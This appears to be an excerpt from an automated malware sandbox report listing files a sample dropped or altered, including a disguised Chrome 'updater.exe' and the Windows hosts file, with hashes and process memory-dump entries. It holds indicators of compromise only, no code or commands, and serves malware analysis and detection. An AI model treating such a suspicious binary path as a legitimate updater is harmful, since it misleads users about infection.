2032658e2249a90f703dedffad238e9cb61c1278

SHA256
1626c6d31f4077d2182d332394c491a0a100e7b86d8ebb478138c3fa887f52f4

SHA512
26317d7192ff10a8edea46e1bd4f195aa1c2ab94b8d18f6f7d758a93f39aa406f2508ada9259d67edd140dd51e652f4c4b0b26ab36986ae27c441fe7cf72cbad

Download Submit
C:\Program Files\Google\Libs\g.log
Filesize
198B

MD5
37dd19b2be4fa7635ad6a2f3238c4af1

SHA1
e5b2c034636b434faee84e82e3bce3a3d3561943

SHA256
8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

SHA512
86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
bb0a9330b4f8abbacc66864911969952

SHA1
f0f95b97434b36dff0a968899682c067ba0b7bdc

SHA256
aee27dd7594b35cda8dc9cc90f916b58b57c46b220a9e62d13cdf5b1a439966f

SHA512
c4172ac321dfc5720049ddc60495211e32b36cc55a53cbcc482e4737b8b11a11ddd05a48b626205e1bcc1991e8971c74e125a3692bb9c0f0ecb035d5e9876714

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
bb0a9330b4f8abbacc66864911969952

SHA1
f0f95b97434b36dff0a968899682c067ba0b7bdc

SHA256
aee27dd7594b35cda8dc9cc90f916b58b57c46b220a9e62d13cdf5b1a439966f

SHA512
c4172ac321dfc5720049ddc60495211e32b36cc55a53cbcc482e4737b8b11a11ddd05a48b626205e1bcc1991e8971c74e125a3692bb9c0f0ecb035d5e9876714

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
2KB

MD5
a774fd7a4b22e14cb51baf5273b7c9f2

SHA1
9a3dab13bb04a2175953f7aea36de83bfb219695

SHA256
e2e064f7101eff07df08618ea418f00273219b1af8cce23e0a22f000b2cbd263

SHA512
a8c14ff733d8982ae2b75ed914c94295ea60ceb9c069479923b6136e817c1f33c791dacde98636f04d0c0aecff5c31e8f7423f9e8a69578e072e49d0bdc86e8c

Download Submit
\Program Files\Google\Chrome\updater.exe
Filesize
7.0MB

MD5
8ae770bdb0a2d1babcc9642c82fd92a3

SHA1
2032658e2249a90f703dedffad238e9cb61c1278

SHA256
1626c6d31f4077d2182d332394c491a0a100e7b86d8ebb478138c3fa887f52f4

SHA512
26317d7192ff10a8edea46e1bd4f195aa1c2ab94b8d18f6f7d758a93f39aa406f2508ada9259d67edd140dd51e652f4c4b0b26ab36986ae27c441fe7cf72cbad

Download Submit
memory/288-85-0x0000000000000000-mapping.dmp

Download
memory/308-136-0x0000000000000000-mapping.dmp

Download
memory/336-93-0x0000000000000000-mapping.dmp

Download
memory/552-75-0x0000000000000000-mapping.dmp

Download
memory/552-129-0x0000000000000000-mapping.dmp

Download
memory/604-66-0x000007FEF3430000-0x000007FEF3F8D000-memory.dmp

Filesize
11.4MB

Download
memory/604-67-0x0000000002534000-0x0000000002537000-memory.dmp

Filesize
12KB

Download
memory/604-68-0x0000000002534000-0x0000000002537000-memory.dmp

Filesize
12KB

Download
memory/604-69-0x000000000253B000-0x000000000255A000-memory.dmp

Filesize
124KB

Download
memory/604-64-0x000007FEFC311000-0x000007FEFC313000-memory.dmp

Filesize
8KB

Download
memory/604-152-0x0000000000000000-mapping.dmp

Download
memory/604-65-0x000007FEF3F90000-0x000007FEF49B3000-memory.dmp

Filesize
10.1MB

Download
memory/604-62-0x0000000000000000-mapping.dmp

Download
memory/664-157-0x0000000000000000-mapping.dmp

Download
memory/776-106-0x000000000283B000-0x000000000285A000-memory.dmp

Filesize
124KB

Download
memory/776-104-0x000000001B800000-0x000000001BAFF000-memory.dmp

Filesize
3.0MB

Download
memory/776-103-0x0000000002834000-0x0000000002837000-memory.dmp

Filesize
12KB

Download
memory/776-102-0x000007FEF3430000-0x000007FEF3F8D000-memory.dmp

Filesize
11.4MB

Download
memory/776-101-0x000007FEF3F90000-0x000007FEF49B3000-memory.dmp

Filesize
10.1MB

Download
memory/776-107-0x0000000002834000-0x0000000002837000-memory.dmp

Filesize
12KB

Download
memory/776-96-0x0000000000000000-mapping.dmp

Download
memory/776-108-0x000000000283B000-0x000000000285A000-memory.dmp

Filesize
124KB

Download
memory/856-105-0x0000000000000000-mapping.dmp

Download
memory/896-139-0x000007FEF3430000-0x000007FEF3F8D000-memory.dmp

Filesize
11.4MB

Download
memory/896-132-0x0000000000000000-mapping.dmp

Download
memory/896-138-0x000007FEF3F90000-0x000007FEF49B3000-memory.dmp

Filesize
10.1MB

Download
memory/896-142-0x0000000001194000-0x0000000001197000-memory.dmp

Filesize
12KB

Download
memory/896-147-0x0000000001194000-0x0000000001197000-memory.dmp

Filesize
12KB

Download
memory/896-148-0x000000000119B000-0x00000000011BA000-memory.dmp

Filesize
124KB

Download
memory/912-81-0x0000000000000000-mapping.dmp

Download
memory/952-89-0x0000000000000000-mapping.dmp

Download
memory/1056-87-0x0000000000000000-mapping.dmp

Download
memory/1100-70-0x0000000000000000-mapping.dmp

Download
memory/1136-83-0x0000000000000000-mapping.dmp

Download
memory/1140-156-0x0000000000000000-mapping.dmp

Download
memory/1276-151-0x00000001400014E0-mapping.dmp

Download
memory/1280-140-0x0000000000000000-mapping.dmp

Download
memory/1328-127-0x00000000011E4000-0x00000000011E7000-memory.dmp

Filesize
12KB

Download
memory/1328-126-0x00000000011E4000-0x00000000011E7000-memory.dmp

Filesize
12KB

Download
memory/1328-124-0x000007FEF3DD0000-0x000007FEF492D000-memory.dmp

Filesize
11.4MB

Download
memory/1328-123-0x000007FEF4930000-0x000007FEF5353000-memory.dmp

Filesize
10.1MB

Download
memory/1328-121-0x0000000000000000-mapping.dmp

Download
memory/1328-128-0x00000000011EB000-0x000000000120A000-memory.dmp

Filesize
124KB

Download
memory/1432-79-0x0000000000000000-mapping.dmp

Download
memory/1468-144-0x0000000000000000-mapping.dmp

Download
memory/1468-91-0x0000000000000000-mapping.dmp

Download
memory/1476-63-0x0000000077A90000-0x0000000077C39000-memory.dmp

Filesize
1.7MB

Download
memory/1476-55-0x000000013F4D0000-0x00000001401B9000-memory.dmp

Filesize
12.9MB

Download
memory/1476-98-0x000000013F4D0000-0x00000001401B9000-memory.dmp

Filesize
12.9MB

Download
memory/1476-61-0x000000013F4D0000-0x00000001401B9000-memory.dmp

Filesize
12.9MB

Download
memory/1476-54-0x000000013F4D0000-0x00000001401B9000-memory.dmp

Filesize
12.9MB

Download
memory/1476-58-0x000000013F4D0000-0x00000001401B9000-memory.dmp

Filesize
12.9MB

Download
memory/1476-56-0x0000000077A90000-0x0000000077C39000-memory.dmp

Filesize
1.7MB

Download
memory/1476-59-0x000000013F4D0000-0x00000001401B9000-memory.dmp

Filesize
12.9MB

Download
memory/1476-99-0x0000000077A90000-0x0000000077C39000-memory.dmp

Filesize
1.7MB

Download
memory/1476-57-0x000000013F4D0000-0x00000001401B9000-memory.dmp

Filesize
12.9MB

Download
memory/1476-60-0x000000013F4D0000-0x00000001401B9000-memory.dmp

Filesize
12.9MB

Download
memory/1488-149-0x0000000000000000-mapping.dmp

Download
memory/1508-77-0x0000000000000000-mapping.dmp

Download
memory/1528-134-0x0000000000000000-mapping.dmp

Download
memory/1560-150-0x0000000000000000-mapping.dmp

Download
memory/1616-130-0x0000000000000000-mapping.dmp

Download
memory/1620-71-0x0000000000000000-mapping.dmp

Download
memory/1652-155-0x0000000000000000-mapping.dmp

Download
memory/1692-146-0x0000000000000000-mapping.dmp

Download
memory/1724-90-0x0000000000000000-mapping.dmp

Download
memory/1728-115-0x000000013FF50000-0x0000000140C39000-memory.dmp

Filesize
12.9MB

Download
memory/1728-161-0x0000000077A90000-0x0000000077C39000-memory.dmp

Filesize
1.7MB

Download
memory/1728-117-0x000000013FF50000-0x0000000140C39000-memory.dmp

Filesize
12.9MB

Download
memory/1728-120-0x0000000077A90000-0x0000000077C39000-memory.dmp

Filesize
1.7MB

Download
memory/1728-114-0x000000013FF50000-0x0000000140C39000-memory.dmp

Filesize
12.9MB

Download
memory/1728-119-0x000000013FF50000-0x0000000140C39000-memory.dmp

Filesize
12.9MB

Download
memory/1728-116-0x000000013FF50000-0x0000000140C39000-memory.dmp

Filesize
12.9MB

Download
memory/1728-125-0x000000013FF50000-0x0000000140C39000-memory.dmp

Filesize
12.9MB

Download
memory/1728-118-0x000000013FF50000-0x0000000140C39000-memory.dmp

Filesize
12.9MB

Download
memory/1728-113-0x000000013FF50000-0x0000000140C39000-memory.dmp

Filesize
12.9MB

Download
memory/1728-141-0x0000000077A90000-0x0000000077C39000-memory.dmp

Filesize
1.7MB

Download
memory/1728-110-0x0000000000000000-mapping.dmp

Download
memory/1728-160-0x000000013FF50000-0x0000000140C39000-memory.dmp

Filesize
12.9MB

Download
memory/1752-112-0x000000013FF50000-0x0000000140C39000-memory.dmp

Filesize
12.9MB

Download
memory/1788-74-0x0000000000000000-mapping.dmp

Download
memory/1796-154-0x0000000000000000-mapping.dmp

Download
memory/1816-78-0x000007FEF4930000-0x000007FEF5353000-memory.dmp

Filesize
10.1MB

Download
memory/1816-86-0x000000001B7C0000-0x000000001BABF000-memory.dmp

Filesize
3.0MB

Download
memory/1816-92-0x00000000027E4000-0x00000000027E7000-memory.dmp

Filesize
12KB

Download
memory/1816-80-0x000007FEF3DD0000-0x000007FEF492D000-memory.dmp

Filesize
11.4MB

Download
memory/1816-95-0x00000000027EB000-0x000000000280A000-memory.dmp

Filesize
124KB

Download
memory/1816-94-0x00000000027E4000-0x00000000027E7000-memory.dmp

Filesize
12KB

Download
memory/1816-153-0x0000000000000000-mapping.dmp

Download
memory/1816-72-0x0000000000000000-mapping.dmp

Download
memory/1840-158-0x0000000000000000-mapping.dmp

Download
memory/1932-159-0x00000001407F25D0-mapping.dmp

Download
memory/1932-162-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1932-163-0x00000000000E0000-0x0000000000100000-memory.dmp

Filesize
128KB

Download
memory/1932-166-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2004-137-0x0000000000000000-mapping.dmp

Download
memory/2004-88-0x0000000000000000-mapping.dmp

Download
memory/2012-84-0x0000000000000000-mapping.dmp

Download
memory/2016-145-0x0000000000000000-mapping.dmp

Download
memory/2032-143-0x0000000000000000-mapping.dmp

Download
memory/2036-82-0x0000000000000000-mapping.dmp

Download
memory/2036-133-0x0000000000000000-mapping.dmp

Download